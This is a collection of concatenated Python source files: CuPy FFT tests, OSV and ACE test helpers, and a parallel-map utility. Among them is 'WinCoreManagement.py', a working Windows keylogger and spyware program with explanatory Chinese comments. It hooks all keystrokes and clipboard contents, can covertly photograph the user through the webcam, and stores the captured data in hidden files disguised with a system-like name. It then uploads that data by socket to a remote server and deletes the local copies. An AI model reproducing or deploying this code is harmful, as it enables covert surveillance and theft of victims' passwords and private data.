a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.hfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_ihfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ihfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'n': 1, 'd': 1},
{'n': 10, 'd': 0.5},
{'n': 100, 'd': 2},
)
@testing.gpu
class TestFftfreq(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftfreq(self, xp, dtype):
out = xp.fft.fftfreq(self.n, self.d)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_rfftfreq(self, xp, dtype):
out = xp.fft.rfftfreq(self.n, self.d)
return out
@testing.parameterize(
{'shape': (5,), 'axes': None},
{'shape': (5,), 'axes': 0},
{'shape': (10,), 'axes': None},
{'shape': (10,), 'axes': 0},
{'shape': (10, 10), 'axes': None},
{'shape': (10, 10), 'axes': 0},
{'shape': (10, 10), 'axes': (0, 1)},
)
@testing.gpu
class TestFftshift(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fftshift(x, self.axes)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_ifftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifftshift(x, self.axes)
return out
class TestThreading(unittest.TestCase):
def test_threading1(self):
import threading
from cupy.cuda.cufft import get_current_plan
def thread_get_curr_plan():
return get_current_plan()
new_thread = threading.Thread(target=thread_get_curr_plan)
new_thread.start()
def test_threading2(self):
import threading
a = cupy.arange(100, dtype=cupy.complex64).reshape(10, 10)
def thread_do_fft():
b = cupy.fft.fftn(a)
return b
new_thread = threading.Thread(target=thread_do_fft)
new_thread.start()
|
tests.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test helpers."""
import datetime
import os
import requests
import subprocess
import tempfile
import threading
from unittest import mock
import pygit2
_EMULATOR_TIMEOUT = 30
_DATASTORE_EMULATOR_PORT = 8002
_DATASTORE_READY_INDICATOR = b'is now running'
TEST_PROJECT_ID = 'test-osv'
class MockRepo:
"""Mock repo."""
def __init__(self, path):
self.path = path
self._repo = pygit2.init_repository(path, True)
tree = self._repo.TreeBuilder().write()
author = pygit2.Signature('OSV', 'infra@osv.dev')
self._repo.create_commit('HEAD', author, author, 'Initial commit', tree, [])
def add_file(self, path, contents):
"""Adds a file."""
oid = self._repo.write(pygit2.GIT_OBJ_BLOB, contents)
self._repo.index.add(pygit2.IndexEntry(path, oid, pygit2.GIT_FILEMODE_BLOB))
self._repo.index.write()
def delete_file(self, path):
"""Delete a file."""
self._repo.index.remove(path)
self._repo.index.write()
def commit(self, author_name, author_email, message='Changes'):
"""Makes a commit."""
tree = self._repo.index.write_tree()
author = pygit2.Signature(author_name, author_email)
self._repo.create_commit('HEAD', author, author, message, tree,
[self._repo.head.peel().oid])
def start_datastore_emulator():
"""Starts Datastore emulator."""
os.environ['DATASTORE_EMULATOR_HOST'] = 'localhost:' + str(
_DATASTORE_EMULATOR_PORT)
os.environ['DATASTORE_PROJECT_ID'] = TEST_PROJECT_ID
os.environ['GOOGLE_CLOUD_PROJECT'] = TEST_PROJECT_ID
proc = subprocess.Popen([
'gcloud',
'beta',
'emulators',
'datastore',
'start',
'--consistency=1.0',
'--host-port=localhost:' + str(_DATASTORE_EMULATOR_PORT),
'--project=' + TEST_PROJECT_ID,
'--no-store-on-disk',
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
_wait_for_emulator_ready(proc, 'datastore', _DATASTORE_READY_INDICATOR)
return proc
def _wait_for_emulator_ready(proc,
emulator,
indicator,
timeout=_EMULATOR_TIMEOUT):
"""Waits for emulator to be ready."""
def _read_thread(proc, ready_event):
"""Thread to continuously read from the process stdout."""
ready = False
while True:
line = proc.stdout.readline()
if not line:
break
if not ready and indicator in line:
ready = True
ready_event.set()
# Wait for process to become ready.
ready_event = threading.Event()
thread = threading.Thread(target=_read_thread, args=(proc, ready_event))
thread.daemon = True
thread.start()
if not ready_event.wait(timeout):
raise RuntimeError(
'{} emulator did not get ready in time.'.format(emulator))
return thread
def reset_emulator():
"""Resets emulator."""
resp = requests.post(
'http://localhost:{}/reset'.format(_DATASTORE_EMULATOR_PORT))
resp.raise_for_status()
def mock_datetime(test):
"""Mocks datetime."""
for to_mock in ('osv.models.utcnow', 'osv.utcnow'):
patcher = mock.patch(to_mock)
mock_utcnow = patcher.start()
mock_utcnow.return_value = datetime.datetime(2021, 1, 1)
test.addCleanup(patcher.stop)
def mock_repository(test):
"""Creates a mock repo."""
tmp_dir = tempfile.TemporaryDirectory()
test.remote_source_repo_path = tmp_dir.name
test.addCleanup(tmp_dir.cleanup)
return MockRepo(test.remote_source_repo_path)
def mock_clone(test, func=None, return_value=None):
"""Mocks clone_repository."""
patcher = mock.patch('osv.repos.clone')
mocked = patcher.start()
if return_value:
mocked.return_value = return_value
else:
mocked.side_effect = func
test.addCleanup(patcher.stop)
|
WinCoreManagement.py
|
import sys, os, time
import socket, struct, json
import win32clipboard # 剪贴板操作,需要安装pywin32才可以
import win32con
import win32api
import cv2
from ctypes import windll
from ctypes import CFUNCTYPE
from ctypes import POINTER
from ctypes import c_int, c_void_p
from ctypes import byref
from ctypes.wintypes import MSG
from threading import Timer
from threading import Thread
from threading import Lock
# 工具
class Utils:
def __init__(self):
# os.path.expanduser获取宿主机的根目录(保存文件使用)
self.base_dir = os.path.expanduser('~') # 如果单纯放到C盘可能涉及权限问题,无法保存,而宿主机的根目录一定可以保存
# 初始化生成日志文件
self.log_path = r'%s/adhsvc.dll.system32' % self.base_dir
open(self.log_path, 'a', encoding='utf-8').close()
win32api.SetFileAttributes(self.log_path, win32con.FILE_ATTRIBUTE_HIDDEN)
# 定义两把锁,控制读写
self.mutex_log = Lock() # 日志锁
self.mutex_photo = Lock() # 照片锁
self.mutex_sock = Lock() # 套接字上传锁
# 服务端的ip和port
self.server_ip = '自己主机的IP地址'
self.server_port = 9999
# 本地调试日志
self.debug = True
self.debug_log_path = r'%s/debug_log' % self.base_dir
self.mutex_debug = Lock()
#用于开发时候的调试日志,便于开发时候查错(可见)
def log_debug(self, res):
if not self.debug: return
#加锁-----因为上传日志到服务器、记录调试日志和记录信息到日志用的是同一把锁,
# 保障同一时间只执行三个操作中的一个
self.mutex_debug.acquire()
with open(self.debug_log_path, mode='a', encoding='utf-8') as f:
f.write('\n%s\n' % res)
#刷新,保证将信息写入到日志中
f.flush()
#锁释放
self.mutex_debug.release()
#正式日志,用于上传到服务器使用(不可见)
def log(self, res):
self.mutex_log.acquire()
with open(self.log_path, mode='a', encoding='utf-8') as f:
f.write(res)
f.flush()
self.mutex_log.release()
#实现了拍照片并保存到宿主机的操作
def take_photoes(self):
while True:
time.sleep(10)
photo_path = r'%s/%s.jpeg' % (self.base_dir, time.strftime('%Y-%m-%d_%H_%M_%S'))
cap = None
try:
# VideoCapture()中第一个参数是摄像头标号,默认情况电脑自带摄像头索引为0,外置为1.2.3…,
# 参数是视频文件路径则打开视频,如cap = cv2.VideoCapture(“../test.avi”)
# CAP_DSHOW是微软特有的,用于关闭摄像头,因为cv2.release()之后摄像头依然开启,所以必需要指定该参数
cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)
ret, frame = cap.read() #frame:读取摄像头获取的一些帧的数据
#写数据和上传照片数据用同一把锁
self.mutex_photo.acquire()
cv2.imwrite(photo_path, frame) #将帧数据写入到文件,实际就是拍照功能
except Exception as e:
self.log_debug('照相异常: %s' % e)
finally:
# 无论如何都要释放锁,关闭相机
self.mutex_photo.release()
if cap is not None: cap.release() #None.release()
#把打开的所有摄像头窗口关闭
cv2.destroyAllWindows()
if os.path.exists(photo_path):
#将保存的照片打开,设置文件属性为隐藏属性(FILE_ATTRIBUTE_HIDDEN),避免被宿主机发现
win32api.SetFileAttributes(photo_path, win32con.FILE_ATTRIBUTE_HIDDEN)
#建立连接、封报头、传数据(上传日志和照片共通的地方)
def send_data(self, headers, data):
try:
#window系统在同一时间大量上传文件可能会有Bug,因此加锁避免这种情况
self.mutex_sock.acquire() # 上传数据的过程中不要做其他事情
#连接固定操作
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((self.server_ip, self.server_port))
#将报头json序列化
head_json = json.dumps(headers)
head_json_bytes = bytes(head_json, encoding='utf-8')
#逐步发送报头长度、报头、数据
client.send(struct.pack('i', len(head_json_bytes)))
client.send(head_json_bytes)
client.sendall(data)
client.close()
res = (True, 'ok')
#记录日志使用
except ConnectionRefusedError as e:
msg = '套接字服务端未启动: %s' % e
res = (False, msg)
except Exception as e:
msg = '套接字其他错误:%s' % e
res = (False, msg)
finally:
self.mutex_sock.release()
return res
def upload_log(self):
while True:
time.sleep(10)
#如果日志文件有内容则继续
if not os.path.getsize(self.log_path): continue
self.mutex_log.acquire()
with open(self.log_path, mode='rb+') as f:
data = f.read()
# self.mutex_log.release()
headers = {
'data_size': len(data),
'filename': os.path.basename(self.log_path)
}
self.log_debug('正在往服务端发送日志......[{}]'.format(data))
is_ok, msg = self.send_data(headers, data)
if is_ok:
self.log_debug('日志[{}]发送成功。。。'.format(data))
else:
self.log_debug('日志[{}]发送失败:{}'.format(data, msg))
continue
#truncate(0)将宿主机的日志清空
f.truncate(0)
self.mutex_log.release()
def upload_photoes(self):
while True:
time.sleep(10)
files = os.listdir(self.base_dir)
#只获取这个根目录中的.jpeg文件
files_jpeg = [file_name for file_name in files if file_name.endswith('jpeg')]
for file_name in files_jpeg:
file_path = r'%s/%s' % (self.base_dir, file_name)
if not os.path.exists(file_path): continue
self.log_debug('开始上传图片: %s' % file_name)
headers = {
'data_size': os.path.getsize(file_path),
'filename': file_name
}
self.mutex_photo.acquire()
with open(file_path, mode='rb+') as f:
data = f.read()
#此处可以直接释放锁,因为拍照时间是我们设置的;上面上传日志时候可能涉及到上传过程中用户还是输入的情况
self.mutex_photo.release()
is_ok, msg = self.send_data(headers, data)
if is_ok:
self.log_debug('图片%s发送完毕......' % file_name)
else:
self.log_debug('图片%s发送失败:%s' % (file_name, msg))
continue
#将上传完的文件删除
os.remove(file_path)
utils = Utils()
# 定义类:定义拥有挂钩与拆钩功能的类
class Toad:
def __init__(self):
#windll.user32是将包装好的结果注册到window中
self.user32 = windll.user32
self.hooked = None
#__开头表示该功能至少内部可见,外部不可见(不可调用)
#具体的注入逻辑函数
def __install_hook_proc(self, pointer):
# self.hooked 为注册钩子(elf.user32.SetWindowsHookExA)返回的句柄
#相当于鱼竿(远程控制的手柄)
self.hooked = self.user32.SetWindowsHookExA(
win32con.WH_KEYBOARD_LL,# 这一行代表注册了全局的键盘钩子,能拦截所有的键盘按键的消息。 # WH_KEYBOARD_LL = 13
pointer,#刚才被加工成C语言函数的python函数
0, # 钩子函数的dll句柄,此处设置为0即可
0 # 所有线程
)
return True if self.hooked else False
#将func这个普通函数注册到钩子中,传过来的func是个python函数,但是最终注入的一定要是转换成C语言
def install_hook_proc(self, func):
#这两句是固定的,总体作用是将python函数转换成C语言函数
#CFUNCTYPE将python的变量添加一个声明(int、void等)
#返回值CMPFUNC最终对func这个python函数进行加工处理,返回的pointer虽然是个指针
#但是相当于pointer已经是个C语言的函数了
CMPFUNC = CFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))
pointer = CMPFUNC(func) # 拿到函数hookProc指针,
#为了逻辑清晰,将具体的注入逻辑写入到__install_hook_proc中,此处转回到__install_hook_proc
if self.__install_hook_proc(pointer):
#如果成功注册钩子,将信息记入调试日志(用于自己调试)
#若开发完成则不需要该日志
utils.log_debug("%s start " % func.__name__) #func.__name__是python本身自带的内置函数,是func这个函数的名字
#msg实际上就是监听window进程以后返回的结果
msg = MSG()
# 监听/获取窗口的消息,消息进入队列后则取出交给勾链中第一个钩子
#GetMessageA获取钩子返回的一些消息;byref是对msg进行的一些信息转换
self.user32.GetMessageA(byref(msg), None, 0, 0)
def uninstall_hook_proc(self):
if self.hooked is None:
return
self.user32.UnhookWindowsHookEx(self.hooked) # 通过钩子句柄删除注册的钩子
self.hooked = None
toad_obj = Toad()
# 2、定义钩子过程(即我们要注入的逻辑):
# 就是个普通函数
#三个变量nCode, wParam, lParam中只有wParam(具体的键盘操作)在函数中有用到;
# 三个变量都在最后将钩取到的数据放回池中用到
def monitor_keyborad_proc(nCode, wParam, lParam):
# win32con.WM_KEYDOWN = 0X0100 # 键盘按下,对应数字256
# win32con.WM_KEYUP = 0x0101 # 键盘起来,对应数字257,监控键盘只需要操作KEYDOWN即可
if wParam == win32con.WM_KEYDOWN:
#固定操作,位运算
hookedKey_ascii = 0xFFFFFFFF & lParam[0]
#chr将ascii码转换成能认识的字符
hookedKey = chr(hookedKey_ascii)
#调试日志
utils.log_debug('监听到hookeKey:[%s] hookedKey_ascii:[%s]' % (hookedKey, hookedKey_ascii))
keyboard_dic = {
220: r'<`>',
189: r'<->',
187: r'<=>',
8: r'<删除键>',
9: r'<tab>',
219: r'<[>',
221: r'<]>',
222: r'<\>',
20: r'<大小写锁定>',
186: r'<;>',
192: r"<'>",
13: r'<enter>',
160: r'<lshift>',
188: r'<,>',
190: r'<.>',
191: r'</>',
161: r'<rshift>',
162: r'<ctrl>',
32: r'<space>',
37: r'<左箭头>',
38: r'<上箭头>',
39: r'<右箭头>',
40: r'<下箭头>',
}
if (hookedKey == 'Q'): # 测试时打开,用于注销钩子程序,正式运行时注释这一段即可
toad_obj.uninstall_hook_proc()
sys.exit(-1)
# pass
if hookedKey_ascii in keyboard_dic: # 按下了了非常规键
res = keyboard_dic[hookedKey_ascii]
utils.log_debug('监听到输入: {}'.format(res))
utils.log(res)
if hookedKey_ascii > 32 and hookedKey_ascii < 127: # 检测击键是否常规按键(非组合键等)
if hookedKey == 'V' or hookedKey == 'C':
win32clipboard.OpenClipboard()
paste_value = win32clipboard.GetClipboardData() # 获取粘贴板的值
win32clipboard.CloseClipboard()
if paste_value: # 剪贴板有值,则代表上述V和C的输入是组合键,用户输入的有效数据在剪贴板里放着
#写入到正常的日志中
utils.log(paste_value)
#调试日志
utils.log_debug('粘贴值: {}'.format(paste_value))
else:
utils.log_debug('监听到输入: {}'.format(repr(hookedKey)))
utils.log(hookedKey)
# CallNextHookEx将钩子的信息重新放回钩链中
return windll.user32.CallNextHookEx(toad_obj.hooked, nCode, wParam, lParam)
# 钩链:钩1,钩2
# 就是个普通函数
# 锁键盘就是不将数据放回池中(不执行return windll.user32.CallNextHookEx)
def lock_keyboard_proc(nCode, wParam, lParam):
utils.log_debug('锁定键盘程序正在执行。。。。。。。。')
return '该处返回值随意,无影响'
if __name__ == '__main__':
# 监听键盘输入->并记录日志
t1 = Thread(target=toad_obj.install_hook_proc, args=(monitor_keyborad_proc,))
# 锁定键盘功能
# Timer指定一段时间(120s)后运行某个线程
# t2 = Timer(120, toad_obj.install_hook_proc, args=[lock_keyboard_proc, ])
# 偷拍功能->保存图片文件
# t3 = Thread(target=utils.take_photoes)
# 上传数据功能:日志文件、图片文件
t4 = Thread(target=utils.upload_log)
t5 = Thread(target=utils.upload_photoes)
# t2.daemon = True
# t3.daemon = True
t4.daemon = True
t5.daemon = True
t1.start()
# t2.start()
# t3.start()
t4.start()
t5.start()
t1.join()
|
bettermap.py
|
#!/usr/bin/python3
import io
import sys
from concurrent.futures import ThreadPoolExecutor
import collections
import itertools
import multiprocessing as mp
import multiprocessing.connection
from multiprocessing.context import ForkProcess
from typing import Iterable, List, Optional, Any, Dict
import dill
from queue import Queue
from threading import Thread
mpctx = mp.get_context("fork")
def threaded_generator(g, maxsize: int = 16):
q = Queue(maxsize=maxsize)
sentinel = object()
def fill_queue():
try:
for value in g:
q.put(value)
finally:
q.put(sentinel)
thread = Thread(name=repr(g), target=fill_queue, daemon=True)
thread.start()
yield from iter(q.get, sentinel)
def slices(n: int, i: Iterable) -> Iterable[List]:
i = iter(i)
while True:
s = list(itertools.islice(i, n))
if len(s) > 0:
yield s
else:
break
def window(seq: Iterable, n:int = 2) -> Iterable[List]:
win = collections.deque(maxlen=n)
for e in seq:
win.append(e)
if len(win) == n:
yield list(win)
def map_per_process(
fn,
input_sequence: Iterable,
*,
serialization_items: Optional[List[Any]] = None,
parallelism: int = mpctx.cpu_count()
) -> Iterable:
if serialization_items is not None and len(serialization_items) > 0:
serialization_ids = [id(o) for o in serialization_items]
class MapPickler(dill.Pickler):
def persistent_id(self, obj):
try:
return serialization_ids.index(id(obj))
except ValueError:
return None
class MapUnpickler(dill.Unpickler):
def persistent_load(self, pid):
return serialization_items[pid]
else:
MapPickler = dill.Pickler
MapUnpickler = dill.Unpickler
def pickle(o: Any) -> bytes:
with io.BytesIO() as buffer:
pickler = MapPickler(buffer)
pickler.dump(o)
return buffer.getvalue()
def unpickle(b: bytes) -> Any:
with io.BytesIO(b) as buffer:
unpickler = MapUnpickler(buffer)
return unpickler.load()
pipeno_to_pipe: Dict[int, multiprocessing.connection.Connection] = {}
pipeno_to_process: Dict[int, ForkProcess] = {}
def process_one_item(send_pipe: multiprocessing.connection.Connection, item):
try:
processed_item = fn(item)
except Exception as e:
import traceback
send_pipe.send((None, (e, traceback.format_exc())))
else:
send_pipe.send((pickle(processed_item), None))
send_pipe.close()
def yield_from_pipes(pipes: List[multiprocessing.connection.Connection]):
for pipe in pipes:
result, error = pipe.recv()
pipeno = pipe.fileno()
del pipeno_to_pipe[pipeno]
pipe.close()
process = pipeno_to_process[pipeno]
process.join()
del pipeno_to_process[pipeno]
if error is None:
yield unpickle(result)
else:
e, tb = error
sys.stderr.write("".join(tb))
raise e
try:
for item in input_sequence:
receive_pipe, send_pipe = mpctx.Pipe(duplex=False)
process = mpctx.Process(target=process_one_item, args=(send_pipe, item))
pipeno_to_pipe[receive_pipe.fileno()] = receive_pipe
pipeno_to_process[receive_pipe.fileno()] = process
process.start()
# read out the values
timeout = 0 if len(pipeno_to_process) < parallelism else None
# If we have fewer processes going than we have CPUs, we just pick up the values
# that are done. If we are at the process limit, we wait until one of them is done.
ready_pipes = multiprocessing.connection.wait(pipeno_to_pipe.values(), timeout=timeout)
yield from yield_from_pipes(ready_pipes)
# yield the rest of the items
while len(pipeno_to_process) > 0:
ready_pipes = multiprocessing.connection.wait(pipeno_to_pipe.values(), timeout=None)
yield from yield_from_pipes(ready_pipes)
finally:
for process in pipeno_to_process.values():
if process.is_alive():
process.terminate()
def ordered_map_per_process(
fn,
input_sequence: Iterable,
*,
serialization_items: Optional[List[Any]] = None
) -> Iterable:
def process_item(item):
index, item = item
return index, fn(item)
results_with_index = map_per_process(
process_item,
enumerate(input_sequence),
serialization_items=serialization_items)
expected_index = 0
items_in_wait = []
for item in results_with_index:
index, result = item
if index == expected_index:
yield result
expected_index = index + 1
items_in_wait.sort(reverse=True)
while len(items_in_wait) > 0 and items_in_wait[-1][0] == expected_index:
index, result = items_in_wait.pop()
yield result
expected_index = index + 1
else:
items_in_wait.append(item)
def ordered_map_per_thread(
fn,
input_sequence: Iterable,
*,
parallelism: int = mpctx.cpu_count()
) -> Iterable:
executor = ThreadPoolExecutor(max_workers=parallelism)
input_sequence = (executor.submit(fn, item) for item in input_sequence)
input_sequence = threaded_generator(input_sequence, maxsize=parallelism)
for future in input_sequence:
yield future.result()
executor.shutdown()
def map_in_chunks(
fn,
input_sequence: Iterable,
*,
chunk_size: int = 10,
serialization_items: Optional[List[Any]] = None
) -> Iterable:
def process_chunk(chunk: List) -> List:
return list(map(fn, chunk))
processed_chunks = map_per_process(
process_chunk,
slices(chunk_size, input_sequence),
serialization_items=serialization_items)
for processed_chunk in processed_chunks:
yield from processed_chunk
def ordered_map_in_chunks(
fn,
input_sequence: Iterable,
*,
chunk_size: int = 10,
serialization_items: Optional[List[Any]] = None
) -> Iterable:
def process_chunk(chunk: List) -> List:
return list(map(fn, chunk))
processed_chunks = ordered_map_per_process(
process_chunk,
slices(chunk_size, input_sequence),
serialization_items=serialization_items)
for processed_chunk in processed_chunks:
yield from processed_chunk
|
test.py
|
# vim: sw=4:ts=4:et
#__all__ = [
#'EV_TEST_DATE',
#'EV_ROOT_ANALYSIS_TOOL',
#'EV_ROOT_ANALYSIS_TOOL_INSTANCE',
#'EV_ROOT_ANALYSIS_ALERT_TYPE',
#'EV_ROOT_ANALYSIS_DESCRIPTION',
#'EV_ROOT_ANALYSIS_EVENT_TIME',
#'EV_ROOT_ANALYSIS_NAME',
#'EV_ROOT_ANALYSIS_UUID',
#'create_root_analysis',
#'ACEBasicTestCase',
#'ACEEngineTestCase',
#'ACEModuleTestCase',
#'reset_alerts',
#'log_count',
#'wait_for_log_count',
#'WaitTimedOutError',
#'wait_for_log_entry',
#'track_io',
#'send_test_message',
#'recv_test_message',
#'splunk_query',
#'wait_for',
#'enable_module',
#'force_alerts',
#'GUIServer',
#'search_log',
#'search_log_regex',
#'search_log_condition',
#'TestEngine',
#'UNITTEST_USER_NAME',
#'UNITTEST_USER_ID',
#]
import atexit
import datetime
import logging
import os, os.path
import secrets
import shutil
import signal
import sys
import threading
import time
from multiprocessing import Manager, RLock, Pipe, Process
from unittest import TestCase
from subprocess import Popen, PIPE
import saq
import saq.engine
from saq.analysis import RootAnalysis, _enable_io_tracker, _disable_io_tracker
from saq.crypto import get_aes_key
from saq.database import initialize_database, get_db_connection, use_db
from saq.engine import Engine
from saq.error import report_exception
from saq.util import storage_dir_from_uuid, workload_storage_dir, abs_path
from saq.splunk import SplunkQueryObject
test_dir = None
UNITTEST_USER_NAME = 'unittest'
UNITTEST_USER_ID = None
# decorators
#
def track_io(target_function):
def wrapper(*args, **kwargs):
try:
_enable_io_tracker()
return target_function(*args, **kwargs)
finally:
_disable_io_tracker()
return wrapper
def force_alerts(target_function):
"""Alerts will be forced ON for the duration of this function."""
def wrapper(*args, **kwargs):
try:
saq.FORCED_ALERTS = True
return target_function(*args, **kwargs)
finally:
saq.FORCED_ALERTS = False
return wrapper
def reset_alerts(target_function):
"""Deletes all alerts in the database."""
def wrapper(*args, **kwargs):
with get_db_connection() as db:
c = db.cursor()
c.execute("""DELETE FROM alerts""")
db.commit()
return target_function(*args, **kwargs)
return wrapper
#
# utility functions
def enable_module(engine_name, module_name):
"""Adds a module to be enabled."""
saq.CONFIG[module_name]['enabled'] = 'yes'
saq.CONFIG[engine_name][module_name] = 'yes'
def wait_for(condition, interval=1, timeout=8):
"""Wait for condition to return True, checking every interval seconds until timeout seconds have elapsed.
Return True if condition returned True before timeout was exceeded, False otherwise."""
timeout = datetime.datetime.now() + datetime.timedelta(seconds=timeout)
while datetime.datetime.now() < timeout:
if condition():
return True
time.sleep(interval)
return False
# test comms pipe is used to communicate between test process and child processes
test_comms_p = None
test_comms_pid = None
test_comms_c = None
def open_test_comms():
global test_comms_p
global test_comms_pid
global test_comms_c
test_comms_p, test_comms_c = Pipe()
test_comms_pid = os.getpid()
def close_test_comms():
test_comms_p.close()
test_comms_c.close()
def get_test_comm_pipe():
# if we are the original process then we use the "parent" pipe
# otherwise we use the "child" pipe
if os.getpid() == test_comms_pid:
return test_comms_p
return test_comms_c
def send_test_message(message):
get_test_comm_pipe().send(message)
def recv_test_message():
return get_test_comm_pipe().recv()
test_log_manager = None
test_log_sync = None
test_log_messages = None
memory_log_handler = None
class WaitTimedOutError(Exception):
pass
#
# custom logging
class MemoryLogHandler(logging.Handler):
def acquire(self):
test_log_sync.acquire()
def release(self):
test_log_sync.release()
def createLock(self):
pass
def emit(self, record):
try:
test_log_messages.append(record)
except:
sys.stderr.write(str(record) + "\n")
def clear(self):
with test_log_sync:
del test_log_messages[:]
def search(self, condition):
"""Searches and returns all log records for which condition(record) was True. Returns the list of LogRecord that matched."""
result = []
with test_log_sync:
for message in test_log_messages:
if condition(message):
result.append(message)
return result
def wait_for_log_entry(self, callback, timeout=5, count=1):
"""Waits for callback to return True count times before timeout seconds expire.
callback takes a single LogRecord object as the parameter and returns a boolean."""
# XXX this is a hack but on slower machines the tests are timing out because the system is slow
if timeout < 30:
timeout = 30
time_limit = datetime.datetime.now() + datetime.timedelta(seconds=timeout)
current_index = 0
current_count = 0
while True:
with test_log_sync:
while current_index < len(test_log_messages):
if callback(test_log_messages[current_index]):
current_count += 1
if current_count == count:
return True
current_index += 1
if datetime.datetime.now() >= time_limit:
raise WaitTimedOutError()
time.sleep(0.1)
def _atexit_callback():
global test_log_manager
if test_log_manager:
try:
test_log_manager.shutdown()
except Exception as e:
print("ERROR: unable to shutdown test log manager: {}".format(e))
def initialize_unittest_logging():
# ACE is multi-process multi-threaded
# so we use this special logging mechanism to keep a central repository of the log events generated
# that the original process can access
global test_log_manager
global test_log_sync
global test_log_messages
global memory_log_handler
test_log_manager = Manager()
atexit.register(_atexit_callback)
test_log_sync = RLock()
test_log_messages = test_log_manager.list()
log_format = logging.Formatter(datefmt='%(asctime)s')
memory_log_handler = MemoryLogHandler()
memory_log_handler.setLevel(logging.DEBUG)
memory_log_handler.setFormatter(log_format)
logging.getLogger().addHandler(memory_log_handler)
def wait_for_log_entry(*args, **kwargs):
return memory_log_handler.wait_for_log_entry(*args, **kwargs)
def log_count(text):
"""Returns the number of times the given text is seen in the logs."""
with test_log_sync:
return len([x for x in test_log_messages if text in x.getMessage()])
def wait_for_log_count(text, count, timeout=5):
"""Waits for text to occur count times in the logs before timeout seconds elapse."""
def condition(e):
return text in e.getMessage()
return memory_log_handler.wait_for_log_entry(condition, timeout, count)
def search_log(text):
return memory_log_handler.search(lambda log_record: text in log_record.getMessage())
def search_log_regex(regex):
return memory_log_handler.search(lambda log_record: regex.search(log_record.getMessage()))
def search_log_condition(func):
return memory_log_handler.search(func)
def splunk_query(search_string, *args, **kwargs):
config = saq.CONFIG['splunk']
q = SplunkQueryObject(
uri=config['uri'],
username=config['username'],
password=config['password'],
*args, **kwargs)
result = q.query(search_string)
return q, result
def initialize_test_environment():
global test_dir
# there is no reason to run anything as root
if os.geteuid() == 0:
print("do not run ace as root please")
sys.exit(1)
# where is ACE?
saq_home = '/opt/saq'
if 'SAQ_HOME' in os.environ:
saq_home = os.environ['SAQ_HOME']
# adjust search path
if os.path.join(saq_home, 'lib') not in sys.path:
sys.path.append(os.path.join(saq_home, 'lib'))
# initialize saq
import saq
saq.initialize(saq_home=saq_home, config_paths=[],
logging_config_path=os.path.join(saq_home, 'etc', 'unittest_logging.ini'),
args=None, relative_dir=None)
if saq.CONFIG['global']['instance_type'] not in [ 'PRODUCTION', 'QA', 'DEV' ]:
sys.stderr.write('\n\n *** CRITICAL ERROR *** \n\ninvalid instance_type setting in configuration\n')
sys.exit(1)
if saq.CONFIG['global']['instance_type'] == 'PRODUCTION':
sys.stderr.write('\n\n *** PROTECT PRODUCTION *** \ndo not execute this in production, idiot\n')
sys.exit(1)
# additional logging required for testing
initialize_unittest_logging()
# create a temporary storage directory
test_dir = os.path.join(saq.SAQ_HOME, 'var', 'test')
if os.path.exists(test_dir):
try:
shutil.rmtree(test_dir)
except Exception as e:
logging.error("unable to delete {}: {}".format(test_dir, e))
sys.exit(1)
try:
os.makedirs(test_dir)
except Exception as e:
logging.error("unable to create temp dir {}: {}".format(test_dir, e))
#initialize_database()
initialized = True
# expected values
EV_TEST_DATE = datetime.datetime(2017, 11, 11, hour=7, minute=36, second=1, microsecond=1)
EV_ROOT_ANALYSIS_TOOL = 'test_tool'
EV_ROOT_ANALYSIS_TOOL_INSTANCE = 'test_tool_instance'
EV_ROOT_ANALYSIS_ALERT_TYPE = 'test_alert'
EV_ROOT_ANALYSIS_DESCRIPTION = 'This is only a test.'
EV_ROOT_ANALYSIS_EVENT_TIME = EV_TEST_DATE
EV_ROOT_ANALYSIS_NAME = 'test'
EV_ROOT_ANALYSIS_UUID = '14ca0ff2-ff7e-4fa1-a375-160dc072ab02'
def create_root_analysis(tool=None, tool_instance=None, alert_type=None, desc=None, event_time=None,
action_counts=None, details=None, name=None, remediation=None, state=None,
uuid=None, location=None, storage_dir=None, company_name=None, company_id=None,
analysis_mode=None):
"""Returns a default RootAnalysis object with expected values for testing."""
return RootAnalysis(tool=tool if tool else EV_ROOT_ANALYSIS_TOOL,
tool_instance=tool_instance if tool_instance else EV_ROOT_ANALYSIS_TOOL_INSTANCE,
alert_type=alert_type if alert_type else EV_ROOT_ANALYSIS_ALERT_TYPE,
desc=desc if desc else EV_ROOT_ANALYSIS_DESCRIPTION,
event_time=event_time if event_time else EV_TEST_DATE,
action_counters=action_counts if action_counts else None,
details=details if details else None,
name=name if name else EV_ROOT_ANALYSIS_NAME,
remediation=remediation if remediation else None,
state=state if state else None,
uuid=uuid if uuid else EV_ROOT_ANALYSIS_UUID,
location=location if location else None,
storage_dir=storage_dir if storage_dir else os.path.relpath(
workload_storage_dir(uuid if uuid else EV_ROOT_ANALYSIS_UUID),
